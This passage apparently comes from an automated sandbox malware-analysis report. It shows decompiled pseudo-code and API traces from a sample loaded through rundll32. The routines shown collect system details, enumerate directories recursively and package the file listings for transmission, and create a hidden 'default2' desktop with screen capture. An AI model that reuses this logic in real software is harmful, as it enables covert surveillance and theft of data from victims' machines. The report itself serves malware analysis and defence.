                                                                                              						E04275B0F(_t133);
                                                                                              						__eflags = _v40 ^ _t193 + 0x00000004;
                                                                                              						return E04275AFE(_v40 ^ _t193 + 0x00000004, _t133);
                                                                                              					}
                                                                                              				} else {
                                                                                              					L3:
                                                                                              					return E04275AFE(_v8 ^ _t190);
                                                                                              				}
                                                                                              			}















































                                                                                              0x0426b0c0
                                                                                              0x0426b0c0
                                                                                              0x0426b0c6
                                                                                              0x0426b0cc
                                                                                              0x0426b0d3
                                                                                              0x0426b0da
                                                                                              0x0426b0df
                                                                                              0x0426b0e3
                                                                                              0x0426b0e7
                                                                                              0x0426b0e8
                                                                                              0x0426b0e9
                                                                                              0x0426b0ea
                                                                                              0x0426b0ec
                                                                                              0x0426b0f0
                                                                                              0x0426b0f5
                                                                                              0x0426b0f8
                                                                                              0x0426b0fa
                                                                                              0x0426b0ff
                                                                                              0x0426b0ff
                                                                                              0x0426b104
                                                                                              0x0426b108
                                                                                              0x0426b123
                                                                                              0x0426b128
                                                                                              0x0426b129
                                                                                              0x0426b132
                                                                                              0x0426b134
                                                                                              0x0426b137
                                                                                              0x0426b139
                                                                                              0x00000000
                                                                                              0x0426b13b
                                                                                              0x0426b141
                                                                                              0x0426b149
                                                                                              0x0426b14e
                                                                                              0x0426b153
                                                                                              0x0426b156
                                                                                              0x0426b158
                                                                                              0x0426b15c
                                                                                              0x0426b161
                                                                                              0x0426b166
                                                                                              0x0426b16b
                                                                                              0x0426b16b
                                                                                              0x0426b170
                                                                                              0x0426b174
                                                                                              0x0426b178
                                                                                              0x0426b17c
                                                                                              0x0426b183
                                                                                              0x0426b186
                                                                                              0x0426b18f
                                                                                              0x0426b19b
                                                                                              0x0426b1a1
                                                                                              0x0426b1a6
                                                                                              0x0426b1a8
                                                                                              0x0426b1ac
                                                                                              0x0426b1b1
                                                                                              0x0426b1b6
                                                                                              0x0426b1bb
                                                                                              0x0426b1bb
                                                                                              0x0426b1c0
                                                                                              0x0426b1c3
                                                                                              0x0426b1d7
                                                                                              0x0426b1d7
                                                                                              0x0426b1da
                                                                                              0x0426b1e0
                                                                                              0x0426b1ea
                                                                                              0x0426b1ea
                                                                                              0x0426b1f0
                                                                                              0x0426b1f9
                                                                                              0x0426b202
                                                                                              0x0426b209
                                                                                              0x0426b211
                                                                                              0x0426b220
                                                                                              0x0426b227
                                                                                              0x0426b22c
                                                                                              0x0426b230
                                                                                              0x0426b230
                                                                                              0x0426b236
                                                                                              0x0426b239
                                                                                              0x0426b241
                                                                                              0x0426b245
                                                                                              0x0426b248
                                                                                              0x0426b24f
                                                                                              0x0426b252
                                                                                              0x0426b257
                                                                                              0x0426b257
                                                                                              0x00000000
                                                                                              0x0426b257
                                                                                              0x0426b24a
                                                                                              0x0426b24a
                                                                                              0x0426b25a
                                                                                              0x0426b263
                                                                                              0x0426b263
                                                                                              0x0426b26b
                                                                                              0x0426b276
                                                                                              0x0426b28c
                                                                                              0x0426b294
                                                                                              0x0426b29c
                                                                                              0x0426b2bc
                                                                                              0x0426b2c6
                                                                                              0x0426b2d0
                                                                                              0x0426b2db
                                                                                              0x0426b2e3
                                                                                              0x0426b2fa
                                                                                              0x0426b300
                                                                                              0x0426b30d
                                                                                              0x0426b313
                                                                                              0x0426b324
                                                                                              0x0426b32f
                                                                                              0x0426b331
                                                                                              0x0426b349
                                                                                              0x0426b34c
                                                                                              0x0426b352
                                                                                              0x0426b352
                                                                                              0x0426b354
                                                                                              0x0426b354
                                                                                              0x0426b357
                                                                                              0x0426b35a
                                                                                              0x0426b35f
                                                                                              0x0426b35f
                                                                                              0x0426b333
                                                                                              0x0426b333
                                                                                              0x0426b33e
                                                                                              0x0426b345
                                                                                              0x0426b345
                                                                                              0x0426b345
                                                                                              0x0426b345
                                                                                              0x0426b36b
                                                                                              0x0426b370
                                                                                              0x0426b372
                                                                                              0x0426b38a
                                                                                              0x0426b38d
                                                                                              0x0426b393
                                                                                              0x0426b393
                                                                                              0x0426b395
                                                                                              0x0426b395
                                                                                              0x0426b398
                                                                                              0x0426b39c
                                                                                              0x0426b39f
                                                                                              0x0426b39f
                                                                                              0x0426b374
                                                                                              0x0426b374
                                                                                              0x0426b386
                                                                                              0x0426b386
                                                                                              0x0426b386
                                                                                              0x0426b386
                                                                                              0x0426b3a4
                                                                                              0x0426b3a7
                                                                                              0x0426b3ad
                                                                                              0x0426b3ad
                                                                                              0x0426b3b0
                                                                                              0x0426b3b0
                                                                                              0x0426b3b3
                                                                                              0x0426b3b3
                                                                                              0x0426b3b6
                                                                                              0x0426b3bb
                                                                                              0x0426b3bb
                                                                                              0x0426b3c3
                                                                                              0x0426b3c8
                                                                                              0x0426b3ca
                                                                                              0x0426b3ce
                                                                                              0x0426b3d2
                                                                                              0x0426b3da
                                                                                              0x0426b3ee
                                                                                              0x0426b3f8
                                                                                              0x0426b3f8
                                                                                              0x0426b10a
                                                                                              0x0426b10a
                                                                                              0x0426b120
                                                                                              0x0426b120

                                                                                              APIs
                                                                                                • Part of subcall function 042562B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,0426B6FC,?,042A6318,?,?,0426B6FC), ref: 04256360
                                                                                                • Part of subcall function 042562B0: RegCloseKey.ADVAPI32(0426B6FC,?,042A6318,?,?,0426B6FC), ref: 0425636D
                                                                                              • GetTickCount.KERNEL32 ref: 0426B189
                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0426B195
                                                                                              • gethostname.WS2_32(?,00000100), ref: 0426B1DA
                                                                                              • GetSystemInfo.KERNEL32(?), ref: 0426B26B
                                                                                              • RegOpenKeyW.ADVAPI32 ref: 0426B29C
                                                                                              • RegQueryValueExW.ADVAPI32(00000004,~MHz,00000000,00000004,00000004,?,?,?,?,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,?), ref: 0426B2BC
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,?), ref: 0426B2C6
                                                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 0426B2E3
                                                                                              • CoInitialize.OLE32(00000000), ref: 0426B300
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpen$CountCurrentGlobalInfoInitializeMemoryProcessQueryStatusSystemTickValuegethostname
                                                                                              • String ID: /$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                                              • API String ID: 963674043-1973391949
                                                                                              • Opcode ID: 3ac1203e5e283a8c2ca3763a9b462afb837c71598cda71045959c74b4887a17c
                                                                                              • Instruction ID: 4e68a3a165c02397e11490911591da01860db6e012a533e48a22cc5e712b882e
                                                                                              • Opcode Fuzzy Hash: 3ac1203e5e283a8c2ca3763a9b462afb837c71598cda71045959c74b4887a17c
                                                                                              • Instruction Fuzzy Hash: 9691D071B143419FDB11DF68D884BAAB7E4FF88304F044569ED499B245EB34FA84CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 75%
                                                                                              			E042542B0(void* __ebx, signed int __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                              				signed int _v12;
                                                                                              				short _v1056;
                                                                                              				char _v2096;
                                                                                              				short _v3136;
                                                                                              				intOrPtr _v3704;
                                                                                              				struct _WIN32_FIND_DATAW _v3728;
                                                                                              				signed int _v3732;
                                                                                              				long _v3736;
                                                                                              				intOrPtr _v3740;
                                                                                              				signed int _v3744;
                                                                                              				void* _v3748;
                                                                                              				signed int _t80;
                                                                                              				void* _t88;
                                                                                              				signed int _t91;
                                                                                              				signed int _t92;
                                                                                              				signed int _t99;
                                                                                              				signed int _t100;
                                                                                              				void* _t101;
                                                                                              				signed int _t104;
                                                                                              				signed int _t128;
                                                                                              				void* _t133;
                                                                                              				signed int _t137;
                                                                                              				signed int _t139;
                                                                                              				void* _t140;
                                                                                              				void* _t141;
                                                                                              				intOrPtr _t142;
                                                                                              				intOrPtr _t143;
                                                                                              				intOrPtr _t144;
                                                                                              				intOrPtr _t145;
                                                                                              				intOrPtr _t147;
                                                                                              				void* _t148;
                                                                                              				void* _t149;
                                                                                              				void* _t150;
                                                                                              				long _t152;
                                                                                              				void* _t153;
                                                                                              				long _t154;
                                                                                              				signed int _t155;
                                                                                              				void* _t156;
                                                                                              				void* _t157;
                                                                                              
                                                                                              				_t80 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t80 ^ _t155;
                                                                                              				_t147 = _a4;
                                                                                              				_t152 = 0x2800;
                                                                                              				_v3744 = __ecx;
                                                                                              				_v3740 = _t147;
                                                                                              				_v3732 = _a8;
                                                                                              				_v3736 = 0x2800;
                                                                                              				_t133 = LocalAlloc(0x40, 0x2800);
                                                                                              				wsprintfW( &_v3136, L"%s\\*.*", _t147);
                                                                                              				_t157 = _t156 + 0xc;
                                                                                              				_t88 = FindFirstFileW( &_v3136,  &_v3728);
                                                                                              				_v3748 = _t88;
                                                                                              				if(_t88 != 0xffffffff) {
                                                                                              					 *_t133 = 0x74;
                                                                                              					_t148 = 1;
                                                                                              					asm("o16 nop [eax+eax]");
                                                                                              					do {
                                                                                              						_t137 = ".";
                                                                                              						_t91 =  &(_v3728.cFileName);
                                                                                              						while(1) {
                                                                                              							_t140 =  *_t91;
                                                                                              							if(_t140 !=  *_t137) {
                                                                                              								break;
                                                                                              							}
                                                                                              							if(_t140 == 0) {
                                                                                              								L7:
                                                                                              								_t92 = 0;
                                                                                              							} else {
                                                                                              								_t145 =  *((intOrPtr*)(_t91 + 2));
                                                                                              								_t14 = _t137 + 2; // 0x2e0000
                                                                                              								if(_t145 !=  *_t14) {
                                                                                              									break;
                                                                                              								} else {
                                                                                              									_t91 = _t91 + 4;
                                                                                              									_t137 = _t137 + 4;
                                                                                              									if(_t145 != 0) {
                                                                                              										continue;
                                                                                              									} else {
                                                                                              										goto L7;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              							L9:
                                                                                              							if(_t92 != 0) {
                                                                                              								_t137 = L"..";
                                                                                              								_t99 =  &(_v3728.cFileName);
                                                                                              								while(1) {
                                                                                              									_t141 =  *_t99;
                                                                                              									if(_t141 !=  *_t137) {
                                                                                              										break;
                                                                                              									}
                                                                                              									if(_t141 == 0) {
                                                                                              										L15:
                                                                                              										_t100 = 0;
                                                                                              									} else {
                                                                                              										_t144 =  *((intOrPtr*)(_t99 + 2));
                                                                                              										_t17 = _t137 + 2; // 0x2e
                                                                                              										if(_t144 !=  *_t17) {
                                                                                              											break;
                                                                                              										} else {
                                                                                              											_t99 = _t99 + 4;
                                                                                              											_t137 = _t137 + 4;
                                                                                              											if(_t144 != 0) {
                                                                                              												continue;
                                                                                              											} else {
                                                                                              												goto L15;
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              									L17:
                                                                                              									if(_t100 != 0) {
                                                                                              										_t101 = 0;
                                                                                              										do {
                                                                                              											_t137 =  *(_t155 + _t101 - 0xe60) & 0x0000ffff;
                                                                                              											_t101 = _t101 + 2;
                                                                                              											 *(_t155 + _t101 - 0x82e) = _t137;
                                                                                              										} while (_t137 != 0);
                                                                                              										if(_a12 != 0) {
                                                                                              											E0427F1B0( &_v2096);
                                                                                              											_t157 = _t157 + 4;
                                                                                              										}
                                                                                              										if(_a16 != 0 || (_v3728.dwFileAttributes & 0x00000010) == 0) {
                                                                                              											_t102 =  &_v2096;
                                                                                              											if(_a20 == 0) {
                                                                                              												_t139 = _v3732;
                                                                                              												while(1) {
                                                                                              													_t142 =  *_t102;
                                                                                              													if(_t142 !=  *_t139) {
                                                                                              														break;
                                                                                              													}
                                                                                              													if(_t142 == 0) {
                                                                                              														L31:
                                                                                              														_t137 = 0;
                                                                                              													} else {
                                                                                              														_t143 =  *((intOrPtr*)(_t102 + 2));
                                                                                              														if(_t143 !=  *((intOrPtr*)(_t139 + 2))) {
                                                                                              															break;
                                                                                              														} else {
                                                                                              															_t102 = _t102 + 4;
                                                                                              															_t139 = _t139 + 4;
                                                                                              															if(_t143 != 0) {
                                                                                              																continue;
                                                                                              															} else {
                                                                                              																goto L31;
                                                                                              															}
                                                                                              														}
                                                                                              													}
                                                                                              													L33:
                                                                                              													_t104 = 0 | _t137 == 0x00000000;
                                                                                              													goto L34;
                                                                                              												}
                                                                                              												asm("sbb ecx, ecx");
                                                                                              												_t137 = _t139 | 0x00000001;
                                                                                              												goto L33;
                                                                                              											} else {
                                                                                              												_push(_v3732);
                                                                                              												_push( &_v2096);
                                                                                              												_t128 = E0427D73B(_t137);
                                                                                              												_t157 = _t157 + 8;
                                                                                              												asm("sbb eax, eax");
                                                                                              												_t104 =  ~( ~_t128);
                                                                                              											}
                                                                                              											L34:
                                                                                              											if(_t104 != 0) {
                                                                                              												_t37 = _t152 - 0x410; // 0x23f0
                                                                                              												if(_t148 > _t37) {
                                                                                              													_t154 = _t152 + 0x410;
                                                                                              													_v3736 = _t154;
                                                                                              													_t133 = LocalReAlloc(_t133, _t154, 0x42);
                                                                                              												}
                                                                                              												 *(_t148 + _t133) = _v3728.dwFileAttributes & 0x00000010;
                                                                                              												_t149 = _t148 + 1;
                                                                                              												wsprintfW( &_v1056, L"%s\\%s", _v3740,  &(_v3728.cFileName));
                                                                                              												_t153 = 2 + lstrlenW( &_v1056) * 2;
                                                                                              												E0427E060(_t149 + _t133,  &_v1056, _t153);
                                                                                              												_t150 = _t149 + _t153;
                                                                                              												_t152 = _v3736;
                                                                                              												_t157 = _t157 + 0x1c;
                                                                                              												 *((intOrPtr*)(_t150 + _t133)) = _v3728.nFileSizeHigh;
                                                                                              												 *((intOrPtr*)(_t150 + _t133 + 4)) = _v3728.nFileSizeLow;
                                                                                              												 *((intOrPtr*)(_t150 + _t133 + 8)) = _v3728.ftLastWriteTime;
                                                                                              												 *((intOrPtr*)(_t150 + _t133 + 0xc)) = _v3704;
                                                                                              												_t148 = _t150 + 0x10;
                                                                                              											}
                                                                                              											if((_v3728.dwFileAttributes & 0x00000010) != 0) {
                                                                                              												goto L39;
                                                                                              											}
                                                                                              										} else {
                                                                                              											L39:
                                                                                              											E0427DEA0(_t148,  &_v1056, 0, 0x410);
                                                                                              											wsprintfW( &_v1056, L"%s\\%s", _v3740,  &(_v3728.cFileName));
                                                                                              											_t137 = _v3744;
                                                                                              											_t157 = _t157 + 0x1c;
                                                                                              											E042542B0(_t133, _t137, _t148, _t152,  &_v1056, _v3732, _a12, _a16, _a20);
                                                                                              										}
                                                                                              									}
                                                                                              									goto L40;
                                                                                              								}
                                                                                              								asm("sbb eax, eax");
                                                                                              								_t100 = _t99 | 0x00000001;
                                                                                              								goto L17;
                                                                                              							}
                                                                                              							goto L40;
                                                                                              						}
                                                                                              						asm("sbb eax, eax");
                                                                                              						_t92 = _t91 | 0x00000001;
                                                                                              						goto L9;
                                                                                              						L40:
                                                                                              					} while (FindNextFileW(_v3748,  &_v3728) != 0);
                                                                                              					if(_t148 > 1) {
                                                                                              						_push(_t137);
                                                                                              						_push(0x3f);
                                                                                              						_push(_t148);
                                                                                              						_push(_t133);
                                                                                              						E04251C60( *((intOrPtr*)(_v3744 + 4)));
                                                                                              					}
                                                                                              					LocalFree(_t133);
                                                                                              					FindClose(_v3748);
                                                                                              				}
                                                                                              				return E04275AFE(_v12 ^ _t155);
                                                                                              			}










































                                                                                              0x042542b9
                                                                                              0x042542c0
                                                                                              0x042542c9
                                                                                              0x042542cc
                                                                                              0x042542d4
                                                                                              0x042542da
                                                                                              0x042542e0
                                                                                              0x042542e6
                                                                                              0x042542f3
                                                                                              0x04254301
                                                                                              0x04254307
                                                                                              0x04254318
                                                                                              0x0425431e
                                                                                              0x04254327
                                                                                              0x0425432d
                                                                                              0x04254330
                                                                                              0x04254335
                                                                                              0x04254340
                                                                                              0x04254340
                                                                                              0x04254345
                                                                                              0x04254350
                                                                                              0x04254350
                                                                                              0x04254356
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425435b
                                                                                              0x04254372
                                                                                              0x04254372
                                                                                              0x0425435d
                                                                                              0x0425435d
                                                                                              0x04254361
                                                                                              0x04254365
                                                                                              0x00000000
                                                                                              0x04254367
                                                                                              0x04254367
                                                                                              0x0425436a
                                                                                              0x04254370
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254370
                                                                                              0x04254365
                                                                                              0x0425437b
                                                                                              0x0425437d
                                                                                              0x04254383
                                                                                              0x04254388
                                                                                              0x04254390
                                                                                              0x04254390
                                                                                              0x04254396
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425439b
                                                                                              0x042543b2
                                                                                              0x042543b2
                                                                                              0x0425439d
                                                                                              0x0425439d
                                                                                              0x042543a1
                                                                                              0x042543a5
                                                                                              0x00000000
                                                                                              0x042543a7
                                                                                              0x042543a7
                                                                                              0x042543aa
                                                                                              0x042543b0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042543b0
                                                                                              0x042543a5
                                                                                              0x042543bb
                                                                                              0x042543bd
                                                                                              0x042543c3
                                                                                              0x042543c5
                                                                                              0x042543c5
                                                                                              0x042543cd
                                                                                              0x042543d0
                                                                                              0x042543d8
                                                                                              0x042543e1
                                                                                              0x042543ea
                                                                                              0x042543ef
                                                                                              0x042543ef
                                                                                              0x042543f6
                                                                                              0x04254409
                                                                                              0x0425440f
                                                                                              0x04254428
                                                                                              0x04254430
                                                                                              0x04254430
                                                                                              0x04254436
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425443b
                                                                                              0x04254452
                                                                                              0x04254452
                                                                                              0x0425443d
                                                                                              0x0425443d
                                                                                              0x04254445
                                                                                              0x00000000
                                                                                              0x04254447
                                                                                              0x04254447
                                                                                              0x0425444a
                                                                                              0x04254450
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254450
                                                                                              0x04254445
                                                                                              0x0425445b
                                                                                              0x0425445f
                                                                                              0x00000000
                                                                                              0x0425445f
                                                                                              0x04254456
                                                                                              0x04254458
                                                                                              0x00000000
                                                                                              0x04254411
                                                                                              0x04254411
                                                                                              0x04254417
                                                                                              0x04254418
                                                                                              0x0425441d
                                                                                              0x04254422
                                                                                              0x04254424
                                                                                              0x04254424
                                                                                              0x04254462
                                                                                              0x04254464
                                                                                              0x0425446a
                                                                                              0x04254472
                                                                                              0x04254474
                                                                                              0x0425447e
                                                                                              0x0425448a
                                                                                              0x0425448a
                                                                                              0x04254494
                                                                                              0x042544aa
                                                                                              0x042544b1
                                                                                              0x042544c7
                                                                                              0x042544da
                                                                                              0x042544e5
                                                                                              0x042544e7
                                                                                              0x042544ed
                                                                                              0x042544f0
                                                                                              0x042544f9
                                                                                              0x04254503
                                                                                              0x0425450d
                                                                                              0x04254511
                                                                                              0x04254511
                                                                                              0x0425451b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425451d
                                                                                              0x0425451d
                                                                                              0x0425452b
                                                                                              0x0425454c
                                                                                              0x04254552
                                                                                              0x0425455e
                                                                                              0x04254571
                                                                                              0x04254571
                                                                                              0x042543f6
                                                                                              0x00000000
                                                                                              0x042543bd
                                                                                              0x042543b6
                                                                                              0x042543b8
                                                                                              0x00000000
                                                                                              0x042543b8
                                                                                              0x00000000
                                                                                              0x0425437d
                                                                                              0x04254376
                                                                                              0x04254378
                                                                                              0x00000000
                                                                                              0x04254576
                                                                                              0x04254589
                                                                                              0x04254594
                                                                                              0x0425459c
                                                                                              0x0425459d
                                                                                              0x0425459f
                                                                                              0x042545a3
                                                                                              0x042545a4
                                                                                              0x042545a4
                                                                                              0x042545aa
                                                                                              0x042545b6
                                                                                              0x042545b6
                                                                                              0x042545ce

                                                                                              APIs
                                                                                              • LocalAlloc.KERNEL32(00000040,00002800,?,?,?), ref: 042542EC
                                                                                              • wsprintfW.USER32 ref: 04254301
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 04254318
                                                                                              • _wcsstr.LIBVCRUNTIME ref: 04254418
                                                                                              • LocalReAlloc.KERNEL32(00000000,000023F0,00000042), ref: 04254484
                                                                                              • wsprintfW.USER32 ref: 042544B1
                                                                                              • lstrlenW.KERNEL32(?), ref: 042544C1
                                                                                              • wsprintfW.USER32 ref: 0425454C
                                                                                              • FindNextFileW.KERNEL32(?,?), ref: 04254583
                                                                                              • LocalFree.KERNEL32(00000000), ref: 042545AA
                                                                                              • FindClose.KERNEL32(?), ref: 042545B6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FindLocalwsprintf$AllocFile$CloseFirstFreeNext_wcsstrlstrlen
                                                                                              • String ID: %s\%s$%s\*.*
                                                                                              • API String ID: 2479123022-1665845743
                                                                                              • Opcode ID: a616818b36c15cb5cd9d85e49269a484b193f9b7ef24dd72029f5054d2563e53
                                                                                              • Instruction ID: b8b47815b0b273c4600c08ceaa5d59ea59de4182d817aee9e0deed0128b3094b
                                                                                              • Opcode Fuzzy Hash: a616818b36c15cb5cd9d85e49269a484b193f9b7ef24dd72029f5054d2563e53
                                                                                              • Instruction Fuzzy Hash: 1691C171A2011AABDF20EF24DC44BEAF7B9FF15348F4444A5E909A3161E772AAC4CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 55%
                                                                                              			E042565A0(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                              				signed int _v12;
                                                                                              				short _v80;
                                                                                              				void* _v108;
                                                                                              				void* _v116;
                                                                                              				struct tagMONITORINFO _v120;
                                                                                              				struct _devicemodeW _v344;
                                                                                              				struct _OSVERSIONINFOA _v496;
                                                                                              				intOrPtr _v780;
                                                                                              				char _v784;
                                                                                              				signed int _t55;
                                                                                              				intOrPtr _t57;
                                                                                              				WCHAR* _t60;
                                                                                              				struct HMONITOR__* _t62;
                                                                                              				signed int _t77;
                                                                                              				struct HDC__* _t83;
                                                                                              				struct HDC__* _t84;
                                                                                              				intOrPtr* _t100;
                                                                                              				signed int _t103;
                                                                                              				struct HDC__* _t104;
                                                                                              				signed int _t109;
                                                                                              				intOrPtr* _t112;
                                                                                              				signed int _t114;
                                                                                              				char* _t115;
                                                                                              				signed int _t116;
                                                                                              
                                                                                              				_t109 = __edx;
                                                                                              				_t55 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t55 ^ _t116;
                                                                                              				_t57 = _a4;
                                                                                              				_t112 = __ecx;
                                                                                              				 *__ecx = 0x429e8b0;
                                                                                              				 *((intOrPtr*)(__ecx + 4)) = _t57;
                                                                                              				 *((intOrPtr*)(_t57 + 0x38)) = __ecx;
                                                                                              				 *((intOrPtr*)(_t112 + 8)) = CreateEventW(0, 1, 0, 0);
                                                                                              				 *_t112 = 0x429df68;
                                                                                              				E04256530();
                                                                                              				 *(_t112 + 0x74) = 0;
                                                                                              				 *(_t112 + 0x78) = 0;
                                                                                              				 *(_t112 + 0x7c) = 0;
                                                                                              				 *(_t112 + 0x80) = 0;
                                                                                              				 *(_t112 + 0x70) = L"default2";
                                                                                              				_t60 = OpenDesktopW(L"default2", 0, 1, 0x10000000);
                                                                                              				 *(_t112 + 0xc) = _t60;
                                                                                              				_t125 = _t60;
                                                                                              				if(_t60 == 0) {
                                                                                              					 *(_t112 + 0xc) = CreateDesktopW( *(_t112 + 0x70), _t60, _t60, _t60, 0x10000000, _t60);
                                                                                              				}
                                                                                              				SetThreadDesktop( *(_t112 + 0xc));
                                                                                              				_t62 = GetDesktopWindow();
                                                                                              				__imp__MonitorFromWindow(_t62, 2);
                                                                                              				_v120.cbSize = 0x68;
                                                                                              				GetMonitorInfoW(_t62,  &_v120);
                                                                                              				_v344.dmSize = 0xdc;
                                                                                              				EnumDisplaySettingsW( &_v80, 0xffffffff,  &_v344);
                                                                                              				_t114 = _v344.dmPelsWidth;
                                                                                              				_t100 = _t112 + 0x38;
                                                                                              				asm("movd xmm1, esi");
                                                                                              				asm("cvtdq2pd xmm1, xmm1");
                                                                                              				asm("addsd xmm1, [eax*8+0x429f970]");
                                                                                              				asm("movd xmm0, eax");
                                                                                              				asm("cvtdq2pd xmm0, xmm0");
                                                                                              				asm("divsd xmm1, xmm0");
                                                                                              				asm("movsd [edi+0x68], xmm1");
                                                                                              				E0427DEA0(_t112, _t100, 0, 0x2c);
                                                                                              				_t103 = _v344.dmPelsHeight;
                                                                                              				 *_t100 = 0x28;
                                                                                              				asm("cdq");
                                                                                              				 *(_t112 + 0x3c) = _t114;
                                                                                              				 *(_t112 + 0x40) = _t103;
                                                                                              				 *((intOrPtr*)(_t112 + 0x44)) = 0x180001;
                                                                                              				 *(_t112 + 0x48) = 0;
                                                                                              				 *(_t112 + 0x58) = 0;
                                                                                              				_t77 = (0x1f + (_t114 + _t114 * 2) * 8 + (_t109 & 0x0000001f) >> 5) * _t103 << 2;
                                                                                              				_push(_t77);
                                                                                              				 *(_t112 + 0x4c) = _t77;
                                                                                              				 *((intOrPtr*)(_t112 + 0x10)) = E04275B55(_t103, _t114, _t125);
                                                                                              				_push( *(_t112 + 0x4c));
                                                                                              				 *((intOrPtr*)(_t112 + 0x88)) = E04275B55(_t103, _t114, _t125);
                                                                                              				_push( *(_t112 + 0x4c) +  *(_t112 + 0x4c));
                                                                                              				 *((intOrPtr*)(_t112 + 0x84)) = E04275B55(_t103, _t114, _t125);
                                                                                              				_t83 = GetDC(0);
                                                                                              				 *(_t112 + 0x14) = _t83;
                                                                                              				_t84 = CreateCompatibleDC(_t83);
                                                                                              				asm("movsd xmm0, [edi+0x68]");
                                                                                              				_t104 = _t84;
                                                                                              				 *(_t112 + 0x20) =  *(_t112 + 0x14);
                                                                                              				 *(_t112 + 0x18) = _t104;
                                                                                              				 *(_t112 + 0x24) = _t104;
                                                                                              				asm("movsd [edi+0x28], xmm0");
                                                                                              				_v496.dwOSVersionInfoSize = 0x94;
                                                                                              				GetVersionExA( &_v496);
                                                                                              				E04265A50( &_v784, _t112, _t114);
                                                                                              				 *((intOrPtr*)(_t112 + 0x30)) = _v784;
                                                                                              				_push(0x2d);
                                                                                              				 *((intOrPtr*)(_t112 + 0x34)) = _v780;
                                                                                              				_t115 = E04275B55( &_v784, _t114, _t125);
                                                                                              				if(_t115 != 0) {
                                                                                              					_t52 = _t115 + 1; // 0x1
                                                                                              					 *_t115 = 0xac;
                                                                                              					E0427E060(_t52, _t100, 0x2c);
                                                                                              					_push(0x3f);
                                                                                              					_push(0x2d);
                                                                                              					_push(_t115);
                                                                                              					E04251C60( *((intOrPtr*)(_t112 + 4)));
                                                                                              					E04275B0F(_t115);
                                                                                              				}
                                                                                              				return E04275AFE(_v12 ^ _t116);
                                                                                              			}



























                                                                                              0x042565a0
                                                                                              0x042565a9
                                                                                              0x042565b0
                                                                                              0x042565b3
                                                                                              0x042565bb
                                                                                              0x042565c3
                                                                                              0x042565c9
                                                                                              0x042565cc
                                                                                              0x042565d5
                                                                                              0x042565d8
                                                                                              0x042565de
                                                                                              0x042565f1
                                                                                              0x042565f8
                                                                                              0x042565ff
                                                                                              0x04256606
                                                                                              0x04256610
                                                                                              0x04256617
                                                                                              0x0425661d
                                                                                              0x04256620
                                                                                              0x04256622
                                                                                              0x04256636
                                                                                              0x04256636
                                                                                              0x0425663c
                                                                                              0x04256642
                                                                                              0x0425664b
                                                                                              0x04256654
                                                                                              0x0425665d
                                                                                              0x04256669
                                                                                              0x0425667a
                                                                                              0x04256680
                                                                                              0x04256686
                                                                                              0x04256690
                                                                                              0x04256694
                                                                                              0x0425669b
                                                                                              0x042566aa
                                                                                              0x042566ae
                                                                                              0x042566b2
                                                                                              0x042566b6
                                                                                              0x042566bb
                                                                                              0x042566c0
                                                                                              0x042566d0
                                                                                              0x042566d6
                                                                                              0x042566dd
                                                                                              0x042566e2
                                                                                              0x042566eb
                                                                                              0x042566f2
                                                                                              0x042566f9
                                                                                              0x04256700
                                                                                              0x04256703
                                                                                              0x04256704
                                                                                              0x0425670f
                                                                                              0x04256712
                                                                                              0x0425671a
                                                                                              0x04256728
                                                                                              0x04256731
                                                                                              0x04256739
                                                                                              0x04256740
                                                                                              0x04256743
                                                                                              0x04256749
                                                                                              0x0425674e
                                                                                              0x04256753
                                                                                              0x0425675c
                                                                                              0x0425675f
                                                                                              0x04256762
                                                                                              0x04256767
                                                                                              0x04256772
                                                                                              0x0425677e
                                                                                              0x04256789
                                                                                              0x04256792
                                                                                              0x04256794
                                                                                              0x0425679c
                                                                                              0x042567a3
                                                                                              0x042567a7
                                                                                              0x042567aa
                                                                                              0x042567af
                                                                                              0x042567ba
                                                                                              0x042567bc
                                                                                              0x042567be
                                                                                              0x042567bf
